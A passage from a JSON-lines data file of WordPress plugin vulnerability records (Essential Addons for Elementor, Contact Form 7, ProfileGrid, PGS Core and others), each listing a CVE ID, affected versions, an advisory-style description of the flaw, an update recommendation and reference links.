version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa70238b-530e-4c90-82f4-c3113887d0e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa70238b-530e-4c90-82f4-c3113887d0e1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.21\\\/includes\\\/Classes\\\/Asset_Builder.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.21\\\/includes\\\/Classes\\\/Asset_Builder.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099937\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3099937\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5188","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.22","versionEndExcluding":"5.9.23","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'get_manual_calendar_events' function in all versions up to, and including, 5.9.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a1d5fd1-80b6-4d62-9837-59ee1e020373?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a1d5fd1-80b6-4d62-9837-59ee1e020373?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Event_Calendar.php#L3255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Event_Calendar.php#L3255\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097900\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097900\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4624","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.20","versionEndExcluding":"5.9.21","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugins for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018eael_ext_toc_title_tag\u2019 parameter in versions up to, and including, 5.9.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedad627-0ccb-41c1-be8d-753f57be618f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bedad627-0ccb-41c1-be8d-753f57be618f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.19\\\/includes\\\/Traits\\\/Elements.php#L550\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.19\\\/includes\\\/Traits\\\/Elements.php#L550\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085420\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3085420\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4449","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.19","versionEndExcluding":"5.9.20","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Fancy Text', 'Filter Gallery', 'Sticky Video', 'Content Ticker', 'Woo Product Gallery', & 'Twitter Feed' widgets in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57ed6c7e-ca8d-476d-adce-905b2cd2eda8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57ed6c7e-ca8d-476d-adce-905b2cd2eda8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3083162%40essential-addons-for-elementor-lite&new=3083162%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3083162%40essential-addons-for-elementor-lite&new=3083162%40essential-addons-for-elementor-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4448","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.19","versionEndExcluding":"5.9.20","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Dual Color Header', 'Event Calendar', & 'Advanced Data Table' widgets in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21e12c72-7898-4896-9852-ebb10e5f9a3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/21e12c72-7898-4896-9852-ebb10e5f9a3b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Dual_Color_Header.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Dual_Color_Header.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Event_Calendar.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Event_Calendar.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Advanced_Data_Table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Advanced_Data_Table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4275","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.19","versionEndExcluding":"5.9.20","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Interactive Circle widget in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Interactive_Circle.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3083162\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.20\\\/includes\\\/Elements\\\/Interactive_Circle.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91f50b65-f001-4c73-bfe3-1aed3fc10d26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/91f50b65-f001-4c73-bfe3-1aed3fc10d26?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2242","slug":"contact-form-7","versionImpact":"5.9","versionEndExcluding":"5.9.2","description":"The Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018active-tab\u2019 parameter in all versions up to, and including, 5.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5bf4972-424a-4470-a0bc-7dcc95378e0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5bf4972-424a-4470-a0bc-7dcc95378e0e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3049594\\\/contact-form-7\\\/trunk\\\/admin\\\/edit-contact-form.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3049594\\\/contact-form-7\\\/trunk\\\/admin\\\/edit-contact-form.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7386","slug":"wpdm-premium-packages","versionImpact":"5.9.1","versionEndExcluding":"5.9.2","description":"The Premium Packages \u2013 Sell Digital Products Securely plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.9.1. This is due to missing nonce validation on the wpdmpp_async_request() function. This makes it possible for unauthenticated attackers to perform actions such as initiating refunds via a forged request granted they can trick a site administrator or shop manager into performing an action such as clicking on a link.","recommendation":"Update to version 5.9.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a714536-c6fd-495b-b774-104657329a74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a714536-c6fd-495b-b774-104657329a74?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/trunk\\\/wpdm-premium-packages.php?rev=3102989#L1148\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdm-premium-packages\\\/trunk\\\/wpdm-premium-packages.php?rev=3102989#L1148\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4156","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.17","versionEndExcluding":"5.9.18","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018eael_event_text_color\u2019 parameter in versions up to, and including, 5.9.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a66e6b-cec0-4110-9bef-a5d41ce1c954?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23a66e6b-cec0-4110-9bef-a5d41ce1c954?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Event_Calendar.php#L3125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/trunk\\\/includes\\\/Elements\\\/Event_Calendar.php#L3125\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079406\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3079406\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4003","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.15","versionEndExcluding":"5.9.16","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the eael_team_members_image_rounded parameter in the Team Members widget in all versions up to, and including, 5.9.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf3190c-e247-4bcc-99e0-2ab2d2fa0590?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1cf3190c-e247-4bcc-99e0-2ab2d2fa0590?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075644%40essential-addons-for-elementor-lite%2Ftrunk&old=3067596%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3075644%40essential-addons-for-elementor-lite%2Ftrunk&old=3067596%40essential-addons-for-elementor-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3728","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.15","versionEndExcluding":"5.9.16","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Filterable Gallery & Interactive Circle widgets in all versions up to, and including, 5.9.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284ea577-ff67-4681-995b-f7bb5ef0ff3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/284ea577-ff67-4681-995b-f7bb5ef0ff3e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075644\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.16\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075644\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.16\\\/includes\\\/Elements\\\/Filterable_Gallery.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075644\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.16\\\/includes\\\/Elements\\\/Interactive_Circle.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3075644\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.16\\\/includes\\\/Elements\\\/Interactive_Circle.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43235","slug":"meta-box","versionImpact":"5.9.10","versionEndExcluding":"5.9.11","description":"Missing Authorization vulnerability in MetaBox.Io Meta Box \u2013 WordPress Custom Fields Framework allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Meta Box \u2013 WordPress Custom Fields Framework: from n\/a through 5.9.10.","recommendation":"Update to version 5.9.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meta-box\\\/wordpress-meta-box-plugin-5-9-10-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meta-box\\\/wordpress-meta-box-plugin-5-9-10-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2167","slug":"event-post","versionImpact":"5.9.9","versionEndExcluding":"5.9.10","description":"The Event post plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'events_list' shortcodes in all versions up to, and including, 5.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.9.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257882%40event-post&new=3257882%40event-post&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3257882%40event-post&new=3257882%40event-post&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32bcff2d-e322-4c9c-b1c2-f07aa54faff9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/32bcff2d-e322-4c9c-b1c2-f07aa54faff9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1319","slug":"event-tickets-plus","versionImpact":"5.9.0","versionEndExcluding":"5.9.1","description":"The Events Tickets Plus WordPress plugin before 5.9.1 does not prevent users with at least the contributor role from leaking the attendees list on any post type regardless of status. (e.g. draft, private, pending review, password-protected, and trashed posts).","recommendation":"Update to version 5.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5904dc7e-1058-4c40-bca3-66ba57b1414b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5904dc7e-1058-4c40-bca3-66ba57b1414b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12575","slug":"poll-maker","versionImpact":"5.8.9","versionEndExcluding":"5.9.0","description":"The Poll Maker \u2013 Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Basic Information Exposure in all versions up to, and including, 5.8.9 via the 'ays_finish_poll' AJAX action. This makes it possible for unauthenticated attackers to retrieve admin email information which is exposed in the poll response.","recommendation":"Update to version 5.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320686\\\/poll-maker\\\/tags\\\/5.9.0\\\/public\\\/class-poll-maker-ays-public.php?old=3317469&old_path=poll-maker%2Ftags%2F5.8.9%2Fpublic%2Fclass-poll-maker-ays-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3320686\\\/poll-maker\\\/tags\\\/5.9.0\\\/public\\\/class-poll-maker-ays-public.php?old=3317469&old_path=poll-maker%2Ftags%2F5.8.9%2Fpublic%2Fclass-poll-maker-ays-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3674cfb8-6372-4309-a9de-e6ef7c0b3836?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3674cfb8-6372-4309-a9de-e6ef7c0b3836?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0856","slug":"pgs-core","versionImpact":"5.8.0","versionEndExcluding":"5.9.0","description":"The PGS Core plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 5.8.0. This makes it possible for unauthenticated attackers to add, modify, or plugin options.","recommendation":"Update to version 5.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c33b1cb-6eb1-48cd-b706-5ec270f4ae7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c33b1cb-6eb1-48cd-b706-5ec270f4ae7e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6411","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.8.9","versionEndExcluding":"5.9.0","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 5.8.9. This is due to a lack of validation on user-supplied data in the 'pm_upload_image' AJAX action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update their user capabilities to Administrator.","recommendation":"Update to version 5.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ef3c7fb-27f5-4829-8cb6-d3a52778a689?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ef3c7fb-27f5-4829-8cb6-d3a52778a689?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L361\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L361\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L390\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L390\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/crop.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/crop.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/coverimg_crop.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/coverimg_crop.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111609\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111609\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0855","slug":"pgs-core","versionImpact":"5.8.0","versionEndExcluding":"5.9.0","description":"The PGS Core plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 5.8.0 via deserialization of untrusted input in the 'import_header' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 5.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/docs.potenzaglobalsolutions.com\\\/docs\\\/ciyashop-wp\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dfc2249-3761-49c6-966e-73c33be74c0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5dfc2249-3761-49c6-966e-73c33be74c0e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6410","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.8.9","versionEndExcluding":"5.9.0","description":"The ProfileGrid \u2013 User Profiles, Groups and Communities plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.8.9 via the 'pm_upload_image' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the profile picture of any user.","recommendation":"Update to version 5.9.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8679f4cd-2cb8-48ad-a531-a00c1b85ed2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8679f4cd-2cb8-48ad-a531-a00c1b85ed2e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L361\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L361\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L390\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/js\\\/profile-magic-admin-power.js#L390\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111609\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/crop.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3111609\\\/profilegrid-user-profiles-groups-and-communities\\\/trunk\\\/public\\\/partials\\\/crop.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0853","slug":"pgs-core","versionImpact":"5.8.0","versionEndExcluding":"5.9.0","description":"The PGS Core plugin for WordPress is vulnerable to SQL Injection via the 'event' parameter in the 'save_header_builder' function in all versions up to, and including, 5.8.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.9.0, or a newer patched 